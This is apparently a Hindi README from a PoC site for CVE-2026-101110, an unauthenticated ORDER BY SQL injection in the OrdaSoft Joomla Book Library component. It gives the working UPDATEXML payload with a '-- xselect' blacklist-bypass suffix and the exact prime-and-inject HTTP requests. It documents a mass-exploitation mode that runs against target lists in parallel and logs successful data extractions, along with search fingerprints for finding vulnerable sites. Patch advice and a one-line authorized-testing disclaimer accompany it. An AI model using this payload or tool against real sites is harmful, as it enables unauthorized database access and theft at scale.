
Python 3 PoC और CVE-2026-101110 के लिए सामूहिक एक्सप्लॉइट, जो OrdaSoft Joomla Book Library <=6.4.6 में field/direction पैरामीटर के माध्यम से एक अनधिकृत ORDER BY SQL इंजेक्शन है।
CVE-2026-101110 के लिए Python 3 PoC — Joomla ≤ 6.4.6 के लिए OrdaSoft Book Library (Free)। 6.4.7+ पर अपग्रेड करें।
| PoCbit | https://pocbit.org/pocs/cve-2026-101110 |
| Catalog | https://pocbit.org/pocs/ |
| Component | com_booklibrary |
| File / function | site/booklibrary.php → books() |
| Parameters | field, direction (sort) |
| Auth | None (public book listings) |
| CWE | CWE-89 SQL Injection |
| CVSS 4.0 | 9.3 Critical (Joomla CNA) |
| Credit | Ala Arfaoui |
Book Library (Free), Joomla में पुस्तक पुस्तकालय / श्रेणी सूचियाँ प्रस्तुत करने वाला OrdaSoft प्लगइन है। 6.4.6 और पूर्व संस्करणों में, books() फ़ंक्शन field और direction पैरामीटर को protectInjectionWithoutQuote() से फ़िल्टर करता है। यह फ़ंक्शन केवल select उपस्ट्रिंग को खोजने वाली कमज़ोर ब्लैकलिस्ट लागू करता है; मिलने पर मान को $db->quote() से लपेट देता है, अस्वीकार नहीं करता।
मान बाद में बिना उद्धरण के ORDER BY अभिव्यक्ति में जोड़े जाते हैं — यहाँ उद्धरण का उपयोग SQL इंजेक्शन को नहीं रोकता (CNA विवरण)।
शोषण के लिए दो शर्तें:
field / direction) मान लिखता है। -- xselect डिकॉय टिप्पणी जोड़ी जाती है; यह ब्लैकलिस्ट जाँच को पार कर जाती है, SQL टिप्पणी शेष पेलोड को प्रभावित नहीं करती।परिणाम: बिना प्रमाणीकरण के ORDER BY SQLi, डेटाबेस पढ़ना/लिखना और साइट अखंडता के लिए गंभीर जोखिम।
Request 1 (prime): ...&field=title&direction=ASC → session sort defaults
Request 2 (inject): ...&field=<expr> -- xselect&direction=ASC
└─ concatenated into ORDER BY (unquoted)
कमज़ोर फ़िल्टर (अवधारणात्मक):
select (उपस्ट्रिंग) है → पूरे मान को उद्धरणों में लपेटें (ORDER BY संदर्भ में अप्रासंगिक)।-- xselect जोड़ता है ताकि ब्लैकलिस्ट टिप्पणी टेल के भीतर select देखे जबकि -- से पहले की सक्रिय अभिव्यक्ति निष्पादन योग्य SQL बनी रहे (error-based / UPDATEXML / stacked ORDER BY तरकीबें)।PoC लागू करता है:
| Step | Action |
|---|---|
| Fingerprint | com_booklibrary paths + optional manifest version |
| Route discovery | showCategory, search, showBooks, books, … + scraped catid / Itemid |
| check | Prime session → confirm SQLi (flag / VERSION()) |
| exploit | Prime → --subquery extract (default SELECT VERSION()) |
| mass | --list + -j parallel targets; exploited.txt on successful leak |
कोड में पेलोड सफ़िक्स स्थिरांक: -- xselect (BLACKLIST_DECOY)।
cd CVE-2026-101110
pip install -r requirements.txt
python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 12 --subquery "SELECT VERSION()" --exploited-list exploited.txt
| Flag | Meaning |
|---|---|
--aggressive | Check mode attempts version leak after prime |
--subquery | Inner expression for UPDATEXML / double-query payloads |
--exploited-list | Tab-separated successful extracts |
--no-color | Disable ANSI (also NO_COLOR) |
JSONL: pocbit, pocbit_catalog, pocbit_page, cve, component, session_primed.
प्राइम (सत्र):
GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=title&direction=ASC HTTP/1.1
इंजेक्ट (PoC डिकॉय जोड़ता है):
GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=UPDATEXML(1,CONCAT(0x7e,(VERSION()),0x7e),1) -- xselect&direction=ASC HTTP/1.1
GET विफल होने पर उसी रूट पर POST वेरिएंट का प्रयास किया जाता है।
मैनिफ़ेस्ट (यदि उजागर हो):
/administrator/components/com_booklibrary/booklibrary.xml≤ 6.4.6 → भेद्य पंक्ति; ≥ 6.4.7 → पैच किया गया (patched_version in check output)।
body="option=com_booklibrary"
body="/components/com_booklibrary/" && body="Joomla"
body="com_booklibrary" && (body="booklibrary" || body="Book Library")
body="ordasoft" && body="booklibrary"
| CVE | Extension | Issue | Fixed |
|---|---|---|---|
| CVE-2026-101110 | Book Library | ORDER BY SQLi + blacklist bypass | 6.4.7 |
| CVE-2026-101111 | Book Library | Reflected XSS (title param) | 6.4.7 |
| CVE-2026-101108 | Vehicle Manager | ORDER BY SQLi | 6.5.8 |
| CVE-2026-100752 | Real Estate Manager | ORDER BY SQLi | 6.7.9 |
आपके द्वारा तैनात सभी OrdaSoft कंपोनेंट को पैच करें।
com_booklibrary SQLi in search/lend tasks (CVE-2010-1522) — different code pathsकेवल अधिकृत परीक्षण और पैच सत्यापन।
CVE-2026-101110 PoC: OrdaSoft Joomla Book Library (Free) <=6.4.6 unauth SQLi — field/direction ORDER BY, session prime + `-- xselect` blacklist bypass (com_booklibrary). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101110